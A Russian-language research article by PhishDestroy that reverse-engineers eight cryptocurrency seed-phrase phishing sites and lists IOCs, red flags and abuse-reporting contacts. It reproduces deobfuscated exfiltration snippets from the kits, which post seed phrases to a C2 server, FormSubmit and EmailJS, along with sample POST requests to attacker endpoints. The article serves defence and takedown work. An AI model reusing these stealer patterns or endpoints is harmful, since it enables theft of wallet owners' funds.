# PhishDestroy — ru/phishing-anatomy ================================================================ Title: Анализ криптофишинга: реверс-инжиниринг 8 реальных программ для кражи семенных фраз Canonical: https://phishdestroy.io/ru/phishing-anatomy Published: 2026-03-27T00:00:00 Author: PhishDestroy Research Schema: NewsArticle, Organization, ImageObject, BreadcrumbList, ListItem, WebPage, WebSite Keywords: crypto phishing analysis, seed phrase stealer, wallet drainer, OSINT investigation, Cloudflare Pages phishing, EmailJS abuse, Telegram bot phishing, cryptocurrency scam, phishing kit reverse engineering, phishing-as-a-service OG image: https://phishdestroy.io/assets/og-cards/articles/phishing-anatomy-og.png ## SUMMARY ---------------------------------------------------------------- Мы перехватили фишинговый трафик в реальном времени и провели реверс-инжиниринг 8 активных программ, похищающих семенные фразы. Боты в Telegram, EmailJS, бэкенды PhaaS — всё раскрыто. ## STRUCTURE ---------------------------------------------------------------- - Анатомия криптовалютного фишинга:Анализ 8 реальных атак - Что мы обнаружили - Универсальная схема атаки - 8 объектов: полная разбивка - Выдача себя за другого человека - Двойная цепочка вывода информации - Результаты анализа OSINT - Выдача себя за другого человека - Подход «Zero-Code» - Выдача себя за другого человека - Тот же комплект, тот же оператор? - Выдача себя за другого человека - Двойное резервирование EmailJS - Выдача себя за другого человека - «Фишинг как услуга» - Связанная инфраструктура (почти не функционирует) - Выдача себя за другого человека - Бэкэнд C2 для защиты от сканеров - Результаты анализа OSINT - Выдача себя за другого человека - Конвейер FormSubmit - Результаты анализа OSINT - Выдача себя за другого человека - Настройка для «скрипт-кидди» - Результаты анализа OSINT - 7 способов кражи вашей семенной фразы - 7 тревожных признаков, по которым можно распознать любой фишинговый сайт - Полная таблица IOC - Домены и инфраструктура - Учетные записи и идентификаторы - Куда сообщать о криптовалютном фишинге - Как защитить себя - Таксономия криптофишинга - Неприятная правда - Помогите нам дать отпор - Связанные расследования - Поделиться этим расследованием - Связанные расследования ## CONTENT ---------------------------------------------------------------- Вернуться к новостям Углубленное расследование Анатомия криптовалютного фишинга: Анализ 8 реальных атак Слушать статью 0:00 / --:-- Скачать в формате PDF — Официальный отчет Мы перехватили фишинговый трафик в режиме реального времени, провели реверс-инжиниринг пяти программ, предназначенных для кражи семенных фраз, и отследили похищенные данные до ботов в Telegram, учетных записей EmailJS и бэкендов сервисов «фишинг как услуга». 27 марта 2026 года Исследование PhishDestroy Время чтения: 18 минут Анализ перехваченного фишингового трафика в режиме реального времени позволяет выявить всю инфраструктуру атаки 8Проанализированные сайты 7Методы вывода данных 1,824+Украденные учетные данные 380+Бренды кошельков $0Стоимость атаки Что мы обнаружили Каждый день тысячи пользователей криптовалют теряют свои средства из-за фишинговых сайтов, которые внешне ничем не отличаются от легальных сервисов кошельков. Но что происходит позади Поддельная кнопка «Connect Wallet»? Куда на самом деле попадает ваша семенная фраза? Мы перехватили актуальный HTTP-трафик с пяти действующих фишинговых сайтов, скачали их полный исходный код и отследили каждый конечный пункт передачи данных до его конечного пункта назначения. Это расследование раскрывает всю структуру современного криптофишинга — от приёмов социальной инженерии, заставляющих вас ввести свою семенную фразу, до бота в Telegram, который передаёт её злоумышленнику в режиме реального времени. Отказ от ответственности Все семенные фразы, приведенные в данной статье, являются тестовыми данными, сгенерированными случайным образом. В ходе данного расследования не произошло утечки реальных учетных данных. О всех сайтах было сообщено их соответствующим хостинг-провайдерам и отделам по борьбе со злоупотреблениями. Универсальная схема атаки Несмотря на различия в брендинге и внутренней инфраструктуре, все 8 фишинговых сайтов следуют абсолютно такая же психологическая воронка: Целевая страницаУкрепление доверия Выбор кошелька60–110+ логотипов Ложное сообщение «Подключение...»Таймер на 3–5 секунд «Ошибка подключения»Всегда завершается сбоем Ввод данных вручнуюСемечко / Ключ / Хранилище ключей ЭксфильтрацияTG / Электронная почта / API Ключевая мысль: анимация «Подключение...» всегда запрограммировано на сбой. В исходном коде сайта № 4 мы обнаружили const success = false — попытка подключения кошелька не предпринимается. Весь этот процесс предназначен исключительно для того, чтобы подтолкнуть жертв к заполнению формы «Подключиться вручную». Универсальная цепочка атак из 6 этапов, характерная для всех проанализированных нами фишинговых сайтов 8 объектов: полная разбивка 1 Протокол сетевого уровня networklayers.pages.dev URLScan [https://urlscan.io/result/019d31e5-c450-76bf-9fcd-d67547b0a1ef/] В прямом эфиреCloudflare PagesБот в Telegram + EmailJS Выдача себя за другого человека Вымышленный «децентрализованный протокол» для проверки кошельков. Для обеспечения достоверности используются актуальные тикеры цен от CryptoCompare и ссылки на реальные блокчейн-браузеры (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano). На целевой странице представлены более 100 логотипов кошельков и описан процесс «проверки», состоящий из 3 этапов. Двойная цепочка вывода информации Самый сложный бэкенд из всех пяти — каждый украденный набор учетных данных проходит через два независимых канала одновременно: Victim submits seed phrase | +--> Channel 1: axios POST --> Express.js on Render.com | | | +--> Telegram Bot API --> @metatech2 (instant DM) | +--> Channel 2: fetch POST --> EmailJS API | +--> Bestgrace309@gmail.com (email backup) Результаты анализа OSINT Показатель | Значение Письмо от мошенника | Bestgrace309@gmail.com Бот в Telegram | @DewdropsTG_bot (ID: 7567323692) Получатель в Telegram | @metatech2 (Идентификатор в чате: 7350941887) Бэкенд | emailjs-backend-ovtg.onrender.com Сервис EmailJS | service_d5qigxs / template_7bqxeaa Скрытый домен | layerschain.in (из обфускации адреса электронной почты CF) Отправленные сообщения | 1 824+ (по идентификатору сообщения в Telegram) Возраст домена | 2 дня (TLS: 25 марта 2026 г.) Нарушение требований оперативной безопасности (OPSEC) Адрес электронной почты злоумышленника был обнаружен в Комментарий на JavaScript внутри config.js: // Bestgrace309@gmail.com. Они забыли удалить его перед развертыванием. Кроме того, бэкенд ретранслятора Telegram полностью открыт — без аутентификации и без ограничения скорости. При декодировании данных Cloudflare data-cfemail помимо обфускации в HTML-коде, мы также обнаружили скрытый адрес электронной почты: support@layerschain.in, подключаясь к индийской и южноафриканской хостинговой инфраструктуре. 2 Миграция токенов AQLA token-aqla.pages.dev В прямом эфиреCloudflare PagesНестатические формы Выдача себя за другого человека Идеальное до пикселя воспроизведение реальности Aqualibre (AQLA) страница миграции токенов. В коде HTML содержится тег метаданных, указывающий на источник: data-scrapbook-source="https://token.aqla.app/migration", с датой 19 ноября 2024 года. Подход «Zero-Code» Для этого атакующего необходимо полное отсутствие кода на стороне сервера. Форма отправляет данные непосредственно на Нестатический [https://un-static.com] — легитимный бэкенд формы для статических сайтов. Каждая отправленная форма перенаправляется на электронную почту мошенника. Адрес электронной почты злоумышленника — никогда не отображается в исходном коде.
Стоимость: 0 долларов Cloudflare Pages: бесплатно. Un-static Forms: бесплатно. Домены не приобретались. Серверы не арендовались. Общая стоимость инфраструктуры: ноль долларов. 3 SafePal Typosquat antiresolve-mysafpalnode.pages.dev URLScan [https://urlscan.io/result/019d31e9-af7c-71a7-ab9e-c72878277e60/] В прямом эфире Cloudflare Pages Нестатические формы Выдача себя за другого человека Субдомен содержит «safpal» — это намеренная орфографическая ошибка в слове SafePal [https://safepal.com], популярный аппаратный кошелек. Сайт маскируется под «Blockchain Wallet Rectification» и содержит 26 поддельных категорий проблем. Для анимации названий блокчейнов (Ethereum, BSC, Polygon…) используется библиотека Typed.js, а для придания сайту достоверности — тикер LiveCoinWatch. Тот же комплект, тот же оператор? Использует абсолютно такой же шаблон фишингового письма как объект № 2: идентичный connect.html, идентичный wallets.html с более чем 60 логотипами, на одном и том же бэкенде Un-static (с разными идентификаторами форм — 6f1b82c3...da9943af). Наличие идентичного набора явно указывает на то, что один оператор, обслуживающий оба сайта. Ошибки в коде: «Privay Policy» (пропущена буква «c»), «seperated» (должно быть «separated»), «Kestore» (пропущена буква «y»). В поле для ввода пароля используется type="text" вместо type="password". 4 Клон сети Flare flaremainnet.pages.dev URLScan [https://urlscan.io/result/019d31e9-3f64-715b-a021-c42b5797c6e6/] В прямом эфиреCloudflare PagesДвойной EmailJS (резервирование) Выдача себя за другого человека Практически идеальный клон Сеть Flare portal — настоящий блокчейн EVM уровня 1 с протоколами FTSO и Data Connector. Включает в себя более 30 партнёров экосистемы, навигацию и брендинг. Фавиконы загружаются с домена, зарегистрированного по методу «типосквот»: portal.flaremainet.com (в слове «mainnet» пропущено одно «n»). Двойное резервирование EmailJS Единственный сайт, на котором используется две отдельные учетные записи EmailJS одновременно для обеспечения отказоустойчивости в случае попытки ликвидации: // Channel 1: EmailJS SDK emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload) // Key: Sza6lhzA9hKHrm1k4 // Channel 2: jQuery AJAX direct $.ajax('https://api.emailjs.com/api/v1.0/email/send', { data: { service_id: 'service_isy47de', template_id: 'template_dkk4d1b', user_id: 'JsVEgXVcaSTro1etu' } }) Тема письма по каждому случаю кражи: "New Wallet Details from Flare". Это финансируемое предприятие HTML-код содержит Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Защита от PPC от Lunio, и Пиксель Twitter/X Ads. Злоумышленник запустил платная реклама чтобы привлечь жертв на фишинговый сайт и отфильтровать клики ботов. Это не хобби — это финансируемая операция с аналитикой и рекламными расходами. Сайт № 4: платная реклама, аналитический мониторинг и двойной вывод данных — самая профессиональная операция 5 COIN NODE / Исправление в кошельке (PhaaS) swiftauthapps.pages.dev URLScan [https://urlscan.io/result/019d31ea-61bd-7003-b971-27d390007a91/] Бэкенд не работаетAPI PulseResolve (PhaaS) Выдача себя за другого человека Универсальный сервис «COIN NODE» / «Wallet Fix» (без указания конкретной марки). Авторские права «Wallet Fix 2022» — этому шаблону набора уже не менее 4 лет. Изображения размещены на pumpeth.com (WordPress на AWS). «Фишинг как услуга» Самая тревожная архитектура бэкенда: а Многопользовательский API на основе UUID: POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef Content-Type: multipart/form-data wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... Каждому мошеннику присваивается собственный конечный пункт с UUID. Центральный оператор обслуживает API, отслеживает кампании и, возможно, получает долю от похищенных средств. Это организованное хищение криптовалюты — модель «фишинга как услуги». Связанная инфраструктура (почти не функционирует) Домен | Роль | Статус api.pulseresolve.com | API для экфильтрации данных | NXDOMAIN walletissuesfix.net | Хостинг фавиконов | NXDOMAIN syncwallet.online | Хостинг логотипов | NXDOMAIN pumpeth.com | CDN для изображений | В режиме реального времени (AWS) Zombie Frontend Бэкенд не работает, но фронтенд по-прежнему работает на Cloudflare Pages. Если злоумышленник повторно зарегистрирует pulseresolve.com, сайт сразу же возобновляет работу. 6 Центр поддержки + Восстановление реестра wallet-support-39n.pages.dev и ledger-recovery.support URLScan (Кошелек) [https://urlscan.io/result/019d31e5-5081-740c-9414-01a22c304b2c/] URLScan (Ledger) [https://urlscan.io/result/019d31db-82db-7120-b2de-e5a8aa24ddac/] В прямом эфиреCloudflare Pages + ReplitПользовательский API C2Автозаполнение BIP39 Выдача себя за другого человека A двухстороннее мероприятие: общий «Центр поддержки» по адресу wallet-support-39n.pages.dev с 15 вымышленными категориями выпусков и 39 брендами кошельков, а также Идеально точный клик-по-клику клон процесса регистрации в Ledger в ledger-recovery.support размещенный на Replit — с возможностью выбора модели устройства, настройки PIN-кода и сеткой из 24 слов начальной фразы с настоящее автозаполнение BIP39. Бэкэнд C2 для защиты от сканеров Страница поддержки кошелька отправляет похищенные данные на api.uranustoken.org/log — настраиваемый сервер управления (C2) на базе nginx/Ubuntu, работающий за Cloudflare. Бэкенд намеренно отклоняет все запросы GET (возвращает ошибку 522 «таймаут»), отвечая только на запросы POST. Это означает, что сканеры URL-адресов, роботы Google Safe Browsing и исследователи в области безопасности, отправляющие запросы GET на этот конечный пункт, ничего не видят — сервер C2 выглядит неактивным. // config.js — C2 config exposed in plaintext const config = { serverURL: "https://api.uranustoken.org", allowedWallets: ["phantom","solfare","metamask","trustwallet", "coinbasewallet","ledger","trezor","okx","sui","backpack", "tonkeeper","magiceden","slush" /* + 26 more */] }; window.IWMConfig = config; // Exfiltration function (deobfuscated from bundle) function Ae(seedPhrase, passPhrase, walletName) { fetch(serverURL + "/log", { method: "POST", headers: {"Content-Type": "application/json"}, body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey}) }) } Клон Ledger запускает отдельный бэкенд на Express.js непосредственно на Replit: POST /api/recovery-phrase сбор {deviceId, pin, phrase}. Он возвращает 400 {"error":"Invalid data provided"} при некорректных входных данных — подтверждая, что бэкенд работает и проходит активную валидацию украденные данные. Результаты анализа OSINT Показатель | Значение Фронтенд (кошелек) | wallet-support-39n.pages.dev Фронтенд (Ledger) | ledger-recovery.support (34.111.179.208) C2 Бэкенд | api.uranustoken.org → nginx/1.24.0 Ubuntu IP-адреса C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 Регистратор | Name.com (ledger-recovery.support) Развернуто | 9 января 2026 г. (заголовок «Last-Modified») Технологический стек | React + Vite + Tailwind v4.1 + Framer Motion Максимальная точность воспроизведения пользовательского опыта Пакет JS объемом 466 КБ содержит полный список слов BIP39 при автозаполнении в режиме реального времени: 67 упоминаний термина «passphrase» и 39 — «mnemonic». Клон Ledger предлагает жертвам пройти точно такой же процесс настройки, как и на подлинном устройстве Ledger — это самая убедительная фишинговая страница за всё время данного расследования. apiKey поле в конфигурации предполагает, что многопользовательская архитектура PhaaS. 7 Децентрализованная платформа для запуска проектов mainnetvalidationapp.pages.dev URLScan [https://urlscan.io/result/019d320b-8e16-7368-a88c-06d52f2d085d/] В прямом эфиреCloudflare PagesFormSubmit.co Выдача себя за другого человека Универсальная «децентрализованная платформа запуска» с 21 категория приманок (стейкинг, миграция, KYC, розыгрыши, получение вознаграждений, восстановление активов, предпродажа, чеканка NFT, заблокированные аккаунты...) и Более 70 брендов кошельков — один из самых полных списков кошельков, с которыми нам доводилось сталкиваться. Характерная опечатка «Sychronize» (пропущена буква «n») выдаёт подделку. Конвейер FormSubmit Области применения FormSubmit.co — легальный сервис для отправки форм по электронной почте. Хеш конечной точки a2cf4131f1a5d39453c7c183df96f86f представляет собой MD5-хэш адреса электронной почты мошенника. Мы провели перебор сотен шаблонов адресов электронной почты в сервисах Gmail, Yahoo, Hotmail, ProtonMail, Yandex и Mail.ru — не найдено. Мошенник использует необычный или сгенерированный случайным образом адрес электронной почты. // Exfiltration via jQuery AJAX → FormSubmit → scammer email $.ajax({ url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f", method: "POST", dataType: "JSON", data: { dappWord: seedPhrase, // THE STOLEN SEED PHRASE dappName: walletName, // Which wallet was selected linkName: "DAPP DECENTRALIZED" // Campaign identifier } }); Результаты анализа OSINT Показатель | Значение Домен | mainnetvalidationapp.pages.dev Хеш FormSubmit | a2cf4131f1a5d39453c7c183df96f86f Идентификатор кампании | DAPP — ДЕЦЕНТРАЛИЗОВАННОЕ ПРИЛОЖЕНИЕ Набор FontAwesome | bdc3291137 (комплект № 112310842, бесплатная версия 6.7.2) jQuery | 3.2.1 + 3.5.1 загружены одновременно Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (несовместимость) Две ручки для переноски Набор FontAwesome bdc3291137 — FontAwesome может определить владельца учетной записи, связанной с этим идентификатором набора. Тег кампании DAPP DECENTRALIZED может появиться на других фишинговых сайтах, использующих тот же хеш FormSubmit. После кражи семенной фразы, поддельный QR-код и случайный 7-символьный референсный код отображается сообщение: «Обратитесь к администратору, указав свой уникальный реферальный код» — заставляя жертв ждать, вместо того чтобы проводить расследование. 8 R2 Bucket + PHP на домашнем компьютере pub-519769e9eb634616b1746c2018641d56.r2.dev МертвыйCloudflare R2PHP + DDNS Выдача себя за другого человека Неизвестно — и фронтенд, и бэкенд находятся в автономном режиме. Судя по структуре полезной нагрузки, речь шла о программе, похищающей семенную фразу криптокошелька. Это Общедоступный хранилище Cloudflare R2 (объектное хранилище, а не Pages) — это хорошо задокументированный вектор фишинга [https://keepaware.com/blog/cloudflare-r2-public-buckets-and-a-phishing-binge] по данным Netskope, было выявлено более 5 000 вредоносных страниц, а объем трафика вырос в 61 раз. Настройка для «скрипт-кидди» Самый примитивная операция в этом наборе. Фразы-семена отправляются слово за словом к скрипту PHP, запущенному на домашнем компьютере или VPS, подключенном через бесплатный динамический DNS: POST mercifuljigga4real123.publicvm.com/fuc.php Content-Type: application/x-www-form-urlencoded pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Результаты анализа OSINT Показатель | Значение Фронтенд | pub-519769e9eb634616b1746c2018641d56.r2.dev [ОФЛАЙН] Бэкенд | mercifuljigga4real123.publicvm.com [NXDOMAIN] Идентификатор ведра R2 | 519769e9eb634616b1746c2018641d56 Провайдер DDNS | DNSExit.com / Netdorm, Inc. (Цинциннати, штат Огайо) DNS NS | ns10–13.dnsexit.com Имя пользователя | mercifuljigga4real123 Имя пользователя OSINT: mercifuljigga4real123 «Merciful» + «jigga» (прозвище Джей-Зи) + «4real» + «123» — явно личный ник, указывающий на приверженность хип-хоп-культуре. Не найдено на любой платформе, индексируемой поисковыми системами: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch или Steam. Вероятно, активен в Discord, Telegram или на игровых платформах под этим именем или его близкими вариантами. Имя файла fuc.php соответствует дерзкому стилю ручки. 7 способов кражи вашей семенной фразы Семь различных архитектур эксфильтрации данных, используемых на 8 фишинговых сайтах Метод | Сайты | Как это работает | Скорость | Стоимость Бот в Telegram | #1 | Express.js на Render.com использует прокси-сервер для подключения к Bot API. Мошенник мгновенно получает личное сообщение с учетными данными. | В режиме реального времени | $0 EmailJS | #1, #4 | JavaScript на стороне клиента отправляет данные напрямую в API EmailJS, который доставляет их на электронную почту мошенника. | ~1 мин | $0 Нестатические формы | #2, #3 | Стандартная HTML-форма с отправкой данных методом POST на легитимный сервис обработки форм, который пересылает отправленные данные по электронной почте. | ~1 мин | $0 FormSubmit.co | #7 | jQuery AJAX на FormSubmit.co. Адрес электронной почты скрыт за хешем MD5. Кампания помечена тегом «DAPP DECENTRALIZED». | ~1 мин | $0 Пользовательский API C2 | #6 | React SPA отправляет запросы к API nginx/Express, расположенному за Cloudflare. Отбрасывает запросы GET (522) для обхода сканеров. Отвечает только на запросы POST. | В режиме реального времени | ~5 долларов в месяц PHP + DDNS | #8 | PHP-скрипт на домашнем компьютере через бесплатный динамический DNS (publicvm.com). Фраза-семена отправляется слово за словом. | В режиме реального времени | $0 API PhaaS | #5 | Многопользовательский API на основе UUID. Центральный оператор управляет бэкендом, а мошенники арендуют конечные точки. | В режиме реального времени | Неизвестно 7 тревожных признаков, по которым можно распознать любой фишинговый сайт Если вы увидите любой Если вы обнаружили что-либо из перечисленного, немедленно закройте вкладку: 1. Сообщение «Сбой подключения» — это всегда подделка Настоящие подключения к кошелькам осуществляются с помощью протокола WalletConnect или браузерных расширений. При этом никогда не появляется ошибка «Сбой подключения», требующая ввести семенную фразу. 2. 50–110+ логотипов кошельков — всё в одном месте Каждый значок кошелька ведёт к одной и той же форме. Настоящий сервис интегрировал бы собственный SDK каждого кошелька. 3. «Ошибка» после отправки Поддельная «Ошибка 503» или «Неизвестная ошибка», появляющаяся после отправки, является преднамеренной. Ваши данные уже были похищены — эта ошибка заставляет вас повторить попытку, используя другой кошелек. 4. Размещено на .pages.dev Все 5 сайтов злоупотребляют бесплатным тарифом Cloudflare Pages. Проверка личности не требуется. В 2025 году количество случаев фишинга с использованием Cloudflare Pages выросло на 198 %. 5. Три вкладки: «Фраза» / «Личный ключ» / «Хранилище ключей» Ни одна легитимная служба не требует всех трёх типов учетных данных. Эта форма с тремя вкладками — характерный признак фишингового набора. 6. Отсутствие взаимодействия с блокчейном Ни один из этих сайтов не загружается ethers.js, web3.js, или выполнять какие-либо RPC-вызовы. Это просто HTML-формы, маскирующиеся под децентрализованные приложения (dApps). 7. Инфраструктура с нулевыми затратами Бесплатный хостинг + бесплатные формы + бесплатный обмен сообщениями = полноценная фишинговая операция за 0 долларов. Если у сайта нет настоящего домена, будьте настороже. Полная таблица IOC Для служб безопасности, платформ аналитики угроз и лиц, сообщающих о злоупотреблениях: Домены и инфраструктура Домен | Тип | Статус networklayers.pages.dev | Фронтенд для фишинга | В прямом эфире token-aqla.pages.dev | Фронтенд для фишинга | В прямом эфире antiresolve-mysafpalnode.pages.dev | Фронтенд для фишинга | В прямом эфире flaremainnet.pages.dev | Фронтенд для фишинга | В прямом эфире swiftauthapps.pages.dev | Фронтенд для фишинга | В прямом эфире emailjs-backend-ovtg.onrender.com | Бэкенд реле TG | В прямом эфире portal.flaremainet.com | Ресурсы, связанные с типосквотингом | Неизвестно layerschain.in | Связанный домен | DNS не работает api.pulseresolve.com | Бэкенд PhaaS | NXDOMAIN walletissuesfix.net | Хост активов | NXDOMAIN syncwallet.online | Хостинг логотипов | NXDOMAIN pumpeth.com | CDN для изображений | В режиме реального времени (AWS) wallet-support-39n.pages.dev | Фронтенд для фишинга | В прямом эфире ledger-recovery.support | Фишинг с использованием кошелька (Replit) | В прямом эфире api.uranustoken.org | Бэкенд C2 (nginx/Ubuntu) | В прямом эфире uranustoken.org | Коренной домен | 404 mainnetvalidationapp.pages.dev | Фронтенд для фишинга | В прямом эфире pub-519769e9eb634616b1746c2018641d56.r2.dev | Фишинг (категория R2) | В автономном режиме mercifuljigga4real123.publicvm.com | PHP-бэкенд (DDNS) | NXDOMAIN Учетные записи и идентификаторы Тип | Значение | Сайт Электронная почта | Bestgrace309@gmail.com | #1 Электронная почта (скрыта) | support@layerschain.in | #1 Бот в Telegram | @DewdropsTG_bot (7567323692) | #1 Пользователь Telegram | @metatech2 (7350941887) | #1 EmailJS № 1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 EmailJS № 2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 EmailJS № 3 | service_isy47de / JsVEgXVcaSTro1etu | #4 Нестатическая форма | c78173e2d991...94c3f76 | #2 Нестатическая форма | 6f1b82c3ce55...da9943af | #3 UUID PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 GTM | GTM-WX2D2TR | #4 MS Clarity | j4bllybjkp | #4 Экземпляр рендеринга | rndr-id: ed83576e-b1b3-4c82 | #1 Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 MD5-хаш формы отправки | a2cf4131f1a5d39453c7c183df96f86f | #7 Теги кампании | DAPP — ДЕЦЕНТРАЛИЗОВАННОЕ ПРИЛОЖЕНИЕ | #7 Набор FontAwesome | bdc3291137 (комплект № 112310842) | #7 Идентификатор ведра R2 | 519769e9eb634616b1746c2018641d56 | #8 Имя пользователя/DDNS | mercifuljigga4real123 | #8 Куда сообщать о криптовалютном фишинге Одновременное воздействие на хостинг, бэкенд-сервисы и платформы обмена сообщениями для максимального ускорения ликвидаций Сервис | О чём следует сообщать | Как Cloudflare | 7 контейнеров .pages.dev + 1 контейнер R2 | abuse.cloudflare.com [https://abuse.cloudflare.com] Google Safe Browsing | Все фишинговые URL-адреса | Сообщить о фишинге [https://safebrowsing.google.com/safebrowsing/report_phish/] PhishTank | Все URL-адреса для списка заблокированных пользователей сообщества | phishtank.org [https://phishtank.org] EmailJS | 3 учетные записи, подвергшиеся злоупотреблению (идентификаторы сервиса указаны выше) | abuse@emailjs.com Нестатический | 2 конечные точки формы | Связаться через un-static.com Render.com | Бэкенд ретранслятора Telegram | Отправить форму о нарушении Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support [https://telegram.org/support] Google (Gmail) | Bestgrace309@gmail.com | Сообщить о нарушении в Google Twitter/X | Рекламный аккаунт для продвижения сайта № 4 | X: Сообщить о нарушении в рекламе FormSubmit.co | Хеш a2cf4131... (#7) | Отправить форму о нарушении Replit | ledger-recovery.support (#6) | Сообщить о нарушении правил Replit Name.com | Регистратор сайта ledger-recovery.support | Отдел по борьбе со злоупотреблениями Name.com DNSExit | mercifuljigga4real123.publicvm.com | dnsexit.com: злоупотребление [https://dnsexit.com/support/abuse/] FontAwesome | Набор bdc3291137 (#7) | Злоупотребление FontAwesome Chainabuse | Все фишинговые кампании | Chainabuse.com [https://chainabuse.com] Как защитить себя Золотое правило Ни один надежный сервис никогда не попросит вас ввести вашу семенную фразу на веб-сайте. Фразы-семена вводятся исключительно в официальное программное обеспечение кошелька при его восстановлении — ни в коем случае не на сторонних сайтах, предлагающих услуги «проверки», «синхронизации» или «восстановления». Перед подключением любого кошелька: Убедитесь, что URL-адрес соответствует официальному домену. Проверьте данные SSL-сертификата. Настоящий WalletConnect использует QR-код или глубокую ссылку — но ни в коем случае не форму с семенной фразой. Если «подключение не удалось» и вам предложено ввести учетные данные вручную — это фишинг. Проверьте подозрительные URL-адреса на PhishTank [https://phishtank.org] или VirusTotal [https://www.virustotal.com] перед тем, как начать взаимодействие. Используйте аппаратный кошелек — он требует физического подтверждения каждой транзакции. Добавляйте в закладки официальные URL-адреса. Ни в коем случае не переходите по ссылкам из рекламных объявлений, личных сообщений или социальных сетей. Таксономия криптофишинга Программы, похищающие семенные фразы, — это лишь одна из категорий. Вот полная картина криптофишинга — в дальнейшем мы будем публиковать подробные обзоры по каждому типу. Программы для кражи семенных фраз Поддельные страницы «Connect Wallet», которые заставляют вас ввести фразу восстановления. В центре внимания этой статьи — подробный анализ 5 реальных примеров. Об этом говорилось выше Узурпация одобрения Вредоносные децентрализованные приложения (dApps), которые запрашивают неограниченное разрешение на расходование токенов через MetaMask. После получения разрешения злоумышленник опустошает ваш кошелек, не нуждаясь в вашей семенной фразе. Скоро «Ледовой фишинг» (Permit2) Использует уязвимость, связанную с разрешениями EIP-2612, не требующими затрат газа. Жертва подписывает внецепочечное сообщение, предоставляющее права на передачу токенов — до момента вывода средств в цепочке не видно никакого подтверждения. Скоро Ложные заявления об аирдропах Поддельные аирдропы токенов, для получения которых требуется «оформление» через вредоносный смарт-контракт. Транзакция по оформлению на самом деле приводит к переводу ваших реальных токенов. Скоро Программы, перехватывающие содержимое буфера обмена Вредоносное ПО, которое отслеживает содержимое вашего буфера обмена и незаметно заменяет скопированные адреса кошельков на адрес злоумышленника перед вставкой. Скоро Опыление + Отравление Незначительные транзакции с похожих адресов загрязняют вашу историю. Жертва копирует поддельный адрес из истории транзакций для своего следующего перевода. Скоро Неприятная правда Стоимость организации криптовалютной фишинговой атаки $0 и занимает менее 30 минут. Бесплатный хостинг, сервисы для создания форм, бесплатные боты для обмена сообщениями. Злоумышленник, стоящий за сайтом № 1, уже похитил учетные данные из 1 824+ пострадавших. Участок № 4 работает платная реклама в полном масштабе. Это не любительские забавы — это целая индустрия. Единственная защита — это осведомленность. Помогите нам дать отпор PhishDestroy отслеживает и сообщает о криптовалютных фишинговых сайтах в режиме реального времени. Если вы наткнулись на подозрительный сайт, сообщите нам об этом — мы расследуем ситуацию и приложим все усилия, чтобы его закрыли. Сообщить о фишинговом сайте Онлайн-лента фишинговых атак Связанные расследования Расследование Конец xmrwallet.com: NameSilo солгала, чтобы защитить вора с буквой «М» 10-летняя история кражи Monero. В деле участвовали 3 регистратора. NameSilo выдумала 7 лживых утверждений. Подробный анализ Сети «Crypto Drainer»: раскрытие инфраструктуры Как в рамках модели «дрейнер как услуга» осуществляется совместное использование инфраструктуры и операторов. Панель открыта Панель фишинга Trust Wallet: полный административный доступ Нам удалось получить доступ к панели администратора фишинговой операции, связанной с Trust Wallet. Инфраструктура Разоблачение инфраструктуры мошенничества: общие бэкенды Как мошеннические проекты совместно используют серверы, шаблоны и схемы оплаты. ## EXTERNAL REFERENCES ---------------------------------------------------------------- urlscan.io (7 mentions) api.destroy.tools (2 mentions) github.com (2 mentions) phishtank.org (2 mentions) t.me (2 mentions) un-static.com (1 mention) safepal.com (1 mention) keepaware.com (1 mention) abuse.cloudflare.com (1 mention) safebrowsing.google.com (1 mention) telegram.org (1 mention) dnsexit.com (1 mention) chainabuse.com (1 mention) www.virustotal.com (1 mention) twitter.com (1 mention) ## ABOUT PHISHDESTROY ---------------------------------------------------------------- PhishDestroy is an independent, open-source threat-intelligence platform. - Current metric definitions and counts: https://phishdestroy.io/api/stats.php - Platform overview: https://phishdestroy.io/llms-full.txt - Domain dossiers: https://phishdestroy.io/domain/{DOMAIN}/llm.txt - Free threat API: https://api.destroy.tools/ - Full article: https://phishdestroy.io/ru/phishing-anatomy If you are an LLM training or inference agent, this content is freely available so you can warn users about the documented scams above. Cite us where appropriate.